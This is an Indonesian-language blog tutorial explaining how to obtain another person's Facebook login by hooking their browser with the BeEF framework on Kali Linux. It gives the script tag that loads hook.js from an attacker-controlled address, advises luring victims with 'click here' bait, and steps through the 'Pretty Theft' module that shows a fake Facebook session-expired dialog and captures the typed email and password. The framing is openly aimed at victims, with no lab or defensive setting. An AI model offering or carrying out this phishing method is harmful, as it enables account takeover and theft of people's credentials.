Cara Mendapatkan Akun Facebook, Tanpa Hack Facebook

Banyak orang  yang ingin hack Facebook. Facebook jauh dari unhackable, tapi untuk melakukannya, Anda memerlukan beberapa keterampilan, dan pengembangan keterampilan, terkadang, jika Anda memiliki sedikit keahlian, sedikit keberuntungan, dan sedikit rekayasa sosial, Anda bisa mendapatkan kredensial Facebook. Itulah tutorial ini.

Jika Anda tidak meluangkan waktu untuk menginstal Kali dan belajar sedikit tentang jaringan dan Linux, ini tidak akan berhasil untuk Anda-tapi jika Anda bersedia meluangkan sedikit waktu untuk belajar, Anda mungkin bisa mendapatkan akses Kepada kredensial Facebook seseorang sangat mudah dengan trik kecil ini.

1. Instal Linux

Langkah pertama adalah mendownload dan menginstal Kali Linux. Ini bisa dilakukan sebagai sistem operasi standalone, dual-boot dengan sistem Windows atau Mac Anda, atau di mesin virtual di dalam sistem operasi pilihan Anda. Tidak, ini tidak bisa dilakukan dengan Windows! Windows, untuk semua kekuatan dan kemudahan penggunaannya, bukanlah sistem operasi hacking yang tepat.

Dalam Kali, ada sebuah aplikasi bernama Browser Exploitation Framework (BeEF). Hal ini mampu membantu Anda meretas browser korban dan mengendalikannya. Begitu Anda menguasai browser mereka, ada banyak hal yang dapat Anda lakukan. Salah satunya adalah mengelabui pengguna agar memberikan kredensial Facebook mereka, yang akan saya tunjukkan di sini.

2. Buka BeEF

Fire up Kali, dan Anda harus disambut dengan layar seperti di bawah ini. Anda menghidupkan BeEF dengan mengklik ikon sapi di sebelah kiri desktop Kali.

Saat Anda mengkliknya, itu akan memulai BeEF dengan membuka terminal.

BeEF adalah aplikasi yang berjalan di latar belakang pada server web pada sistem Anda yang Anda akses dari browser. Begitu BeEF aktif dan berjalan, buka browser IceWeasel Anda untuk mengakses antarmuka. Anda bisa login ke BeEF dengan menggunakan username beef dan password beef.

Anda kemudian akan disambut oleh layar “Getting Started” BeEF.

3. Langkah 3Hook the Victim’s Browser

Ini adalah bagian paling kritis-bahkan mungkin yang paling sulit-dari hack ini. Anda harus membuat korban mengklik tautan JavaScript yang dirancang khusus untuk “menghubungkan” browser mereka. Hal ini bisa dilakukan dengan cara yang tak terhitung banyaknya.

Cara termudah adalah dengan hanya menanamkan kode ke situs web Anda dan membujuk pengguna untuk mengekliknya. Ini mungkin dilakukan dengan teks seperti “Klik di sini untuk informasi lebih lanjut” atau “Klik di sini untuk melihat videonya.” Gunakan imajinasimu.

Skripnya terlihat seperti di bawah ini. Embed ke dalam halaman web, dan ketika seseorang mengkliknya, Anda memiliki browser mereka! (Komentar di bawah jika Anda memiliki pertanyaan mengenai hal ini; Anda mungkin juga menggunakan MitMf untuk mengirim kode ke pengguna, namun ini memerlukan lebih banyak keterampilan.)

<Script src = “http://192.168.1.101:3000/hook.js” type =” text / javascript “> </ script>

Dari sini, saya akan berasumsi bahwa Anda telah “mengaitkan” browser korban dan siap memilikinya.

4. Langkah 4Kirim Kotak Dialog ke Pengguna

Bila Anda telah menghubungkan browser korban, alamat IP-nya, beserta ikon sistem operasi dan ikon jenis browser, akan muncul di panel “Hooked Browsers” di sebelah kiri. Di sini, saya hanya menggunakan browser saya sendiri untuk ditunjukkan.

Jika kita klik pada browser yang terhubung, ia akan membuka antarmuka BeEF di sisi kanan. Perhatikan bahwa ini memberi kami detail browser awalnya. Ini juga memberi kita sejumlah tab. Untuk tujuan kami di sini, kami tertarik pada tab ‘Perintah’.

Klik pada tab “Perintah”, lalu gulir ke bawah “Modul Pohon” sampai Anda tiba di “Rekayasa Sosial” dan klik untuk memperluasnya. Ini akan menampilkan banyak modul rekayasa sosial. Klik “Pretty Theft”, yang akan membuka jendela “Module Results History” dan “Pretty Theft”.

Modul ini memungkinkan Anda mengirim jendela pop-up di browser pengguna. Dalam kasus kami, kami akan menggunakan kotak dialog Facebook.

Jika kita klik pada kotak “Tipe Dialog”, kita dapat melihat bahwa modul ini tidak hanya dapat membuat kotak dialog Facebook, tapi juga kotak dialog LinkedIn, Windows, YouTube, Yammer, dan generik. Pilih jenis dialog Facebook, lalu klik tombol “Execute” di bagian bawah.

5. Kotak Dialog Muncul di Sistem Sasaran

Saat Anda mengklik “Execute” di BeEF, sebuah kotak dialog akan muncul di browser korban seperti di bawah ini. Ini memberitahu korban bahwa sesi Facebook mereka telah berakhir dan mereka perlu memasukkan kembali kredensial mereka.

Meskipun Anda mungkin curiga terhadap kotak pop-up tersebut, sebagian besar pengguna akan percaya bahwa sesi Facebook mereka akan berakhir dan hanya akan memasukkan email dan kata kunci mereka di.

6. Harvest the Credentials

Kembali pada sistem kami di antarmuka BeEf, kita dapat melihat bahwa kredensial muncul di jendela “Hasil perintah”. Korban telah memasukkan alamat email mereka “loveofmylife@gmail.com” dan kata sandinya “sweetbippy” dan mereka telah ditangkap dan dipandu oleh Anda di BeEF.

Jika Anda benar-benar bertekad untuk mendapatkan kredensial Facebook itu, hal itu pasti bisa dilakukan, dan ini hanyalah salah satu cara dari banyak metode (tapi mungkin yang paling sederhana).

Jika Anda ingin mengembangkan keterampilan ke tingkat yang lebih tinggi lagi, mulailah belajar di sini  untuk menguasai keahlian paling berharga dari peretas abad ke-21!

Rich Snippets
Published
Article
Cara Mendapatkan Akun Facebook, Tanpa Hack Facebook
Ratings
51star1star1star1star1star
Azizul Hakim

Satu-satunya sumber pengetahuan adalah pengalaman

Leave a Reply